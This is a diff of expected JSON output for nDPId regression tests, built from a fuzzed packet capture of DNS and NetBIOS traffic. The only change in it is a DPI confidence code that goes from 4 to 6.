-00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470373592,"flow_last_seen":1120470373593,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470590283,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2775,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470373592,"flow_last_seen":1120470373593,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470590283,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2775,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470385615,"flow_last_seen":1120470394622,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470590283,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2776,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470402625,"flow_last_seen":1120470402625,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470590283,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2782,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470402625,"flow_last_seen":1120470402625,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470590283,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2782,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470402624,"flow_last_seen":1120470402624,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470590283,"l3_proto":"ip4","src_ip":"192.168.33.2","dst_ip":"192.168.1.1","src_port":2782,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":58,"global_ts_msec":1120470636050} 00416{"packet_event_id":1,"packet_event_name":"packet","packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":92,"pkt_l4_len":0,"thread_ts_msec":1120470590283,"pkt":"\/\/\/\/\/\/\/\/AODtAW5LCABFAJxOa4EAAIARSszAqAECwKgB\/wCJAIkAOltZhUIBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFTkVPYkFDQUNBekFDQUJNAAAgAAE="} 
@@ -885,7 +885,7 @@ 00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":464,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470033172,"flow_last_seen":1120470033172,"flow_idle_time":620000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1120470637551,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","l4_proto":240,"flow_datalink":1,"flow_max_packets":3} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":464,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470419648,"flow_last_seen":1120470419648,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470637551,"l3_proto":"ip4","src_ip":"0.168.1.2","dst_ip":"192.168.1.1","src_port":2783,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":464,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470414647,"flow_last_seen":1120470423654,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470637551,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2783,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":464,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470431657,"flow_last_seen":1120470431657,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470637551,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.5.2","src_port":53,"dst_port":2784,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":464,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470431657,"flow_last_seen":1120470431657,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470637551,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.5.2","src_port":53,"dst_port":2784,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":464,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470431656,"flow_last_seen":1120470431656,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470637551,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2784,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":464,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470448149,"flow_last_seen":1120470448149,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470637551,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2785,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":464,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470456151,"flow_last_seen":1120470456151,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470637551,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.3","src_port":2786,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -896,20 +896,20 @@ 00594{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":464,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470457512,"flow_last_seen":1120470465524,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470637551,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2787,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":464,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470657808,"flow_last_seen":1120470657808,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1120470657808,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00692{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":464,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":180,"flow_packet_id":1,"flow_last_seen":1120470657808,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1120470657808,"pkt":"\/\/\/\/\/\/\/\/AGCXD+5yCABFAADKXL8AAIARWOvAqAEpwKgB\/wCKAIoAtl+xEQKRTcCoASkAigCgAAAgRU1FQkVDREJEQkRCQ0FDQUNBQ0FDQUNBQ0FDQUNBQUEAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAABgAAAAAAAAAAAOgDAAAAAAAAAAAGAMEAAwABAAEAAgAXAFxNQUlMU0xPVFxCUk9XU0UACQTYAAAA"} 
-00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":464,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470657808,"flow_last_seen":1120470657808,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1120470657808,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":464,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470657808,"flow_last_seen":1120470657808,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1120470657808,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 
00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":465,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470657808,"flow_last_seen":1120470657808,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470657808,"l3_proto":"ip4","src_ip":"192.184.189.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":465,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":181,"flow_packet_id":1,"flow_last_seen":1120470657808,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470657808,"pkt":"\/\/\/\/\/\/\/\/AGCXD+5yCABFAABOXMAAAIARWWbAuL0pwKgB\/wCJAIkAOmgjkU8BEAABAAAAAAAAIEZIRVBGQ0VMRUh2Q0VQRkZGQUNBQ0FDQUNBQ0FDQUJMAAAgAAE="} -00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":465,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470657808,"flow_last_seen":1120470657808,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470657808,"l3_proto":"ip4","src_ip":"192.184.189.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
+00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":465,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470657808,"flow_last_seen":1120470657808,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470657808,"l3_proto":"ip4","src_ip":"192.184.189.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":466,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470658556,"flow_last_seen":1120470658556,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470658556,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":466,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":182,"flow_packet_id":1,"flow_last_seen":1120470658556,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470658556,"pkt":"\/\/\/\/\/\/\/\/AGCXD+5yCABFAABOXMEAAIARWWXAqAEpwKgB\/wCJAIkAOmgjkU8BEAABAAAAAAAAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0ElcwBMAAAgAAE="} 
-00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":466,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470658556,"flow_last_seen":1120470658556,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470658556,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":466,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470658556,"flow_last_seen":1120470658556,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470658556,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":467,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470659308,"flow_last_seen":1120470659308,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470659308,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"107.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":467,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":1,"flow_last_seen":1120470659308,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470659308,"pkt":"\/\/\/\/\/\/\/\/AGCXD+5yCABFAABOXMIAAIARWWTAqAEpa6gB\/wCJAIkAOmgjkU8BEAABAAAAAAAAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJMAAAgAAE="} -00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":467,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470659308,"flow_last_seen":1120470659308,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470659308,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"107.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":467,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470659308,"flow_last_seen":1120470659308,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470659308,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"107.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
00692{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":468,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":180,"flow_packet_id":2,"flow_last_seen":1120470662062,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1120470662062,"pkt":"\/\/\/\/\/\/\/\/AGCXD+5yCABFAADKXMMAAIARWOfAqAEpwKgB\/wCKAIqWtl+uEQKRUMCoASkAigCgAAAgRU1FQkVDREJEQkRCQ0FDQUNBQ0FDQUNBMEFDQUNBQUEAIEZIRVBGQ0dMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAABgAAAAAAAAAAAOgDAAAAAAAAAAAGAFYAAwABAAEAQgAXAFxNQUlMU7xPVFxCUk9XU0UACQTYAAAA"} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":469,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470662062,"flow_last_seen":1120470662062,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470662062,"l3_proto":"ip4","src_ip":"115.0.1.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":469,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":184,"flow_packet_id":1,"flow_last_seen":1120470662062,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470662062,"pkt":"\/\/\/\/\/\/\/\/AGCXD+5yCABFAABOXMQAAIARWSVzAAEpwKgB\/wCJAIkAOmggkVIBEAABAAAAAAAAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJTAAAgAAE="} 
-00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":469,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470662062,"flow_last_seen":1120470662062,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470662062,"l3_proto":"ip4","src_ip":"115.0.1.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":469,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470662062,"flow_last_seen":1120470662062,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470662062,"l3_proto":"ip4","src_ip":"115.0.1.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":470,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":182,"flow_packet_id":2,"flow_last_seen":1120470662812,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470662812,"pkt":"\/\/\/\/\/\/\/\/AGCXD+5yCABFAABOXMUAAIARWWHAqAEpwKgB\/wCJAIkAOGggkVIBEAABAAAAAAAAIEZIRVBGQ0VMRUhGQ0VQRkZGQUM1Q0FDQUNBQ0FDQUJMAAAgAAE="} 
00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":471,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":182,"flow_packet_id":3,"flow_last_seen":1120470663563,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470663563,"pkt":"\/\/\/\/\/\/\/\/AGCXD+5yCABFAABOXMYAAIARWWDAqAEpwKgB\/wCJAIkAOmggkVIBEAABAAAAAAAAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJMAAAgAAE="} 00692{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":180,"flow_packet_id":3,"flow_last_seen":1120470666317,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1120470666317,"pkt":"\/\/\/\/\/\/\/\/AGCXD+5yCABFAADKXMcAAIARWOPAqAEpwKgB\/wCKAIoAtl+rEQKRU8CoASkAigCgAAAgRU1FQkVDREJEQkRCQ0FDQUNBQ0FDQUNBQ0FDQUNBQUEQIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAABMAAAAAAAAAAAAEQAABgAAQAAAAAAAAOgDAAAAAAAAAAAGAFYAAwABAAEAAgAXAFxNQUlMU0xPVFxCUk9XU0UACQTYAM8A"} 
@@ -920,8 +920,8 @@ 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":475,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470474627,"flow_last_seen":1120470482638,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470666318,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2789,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 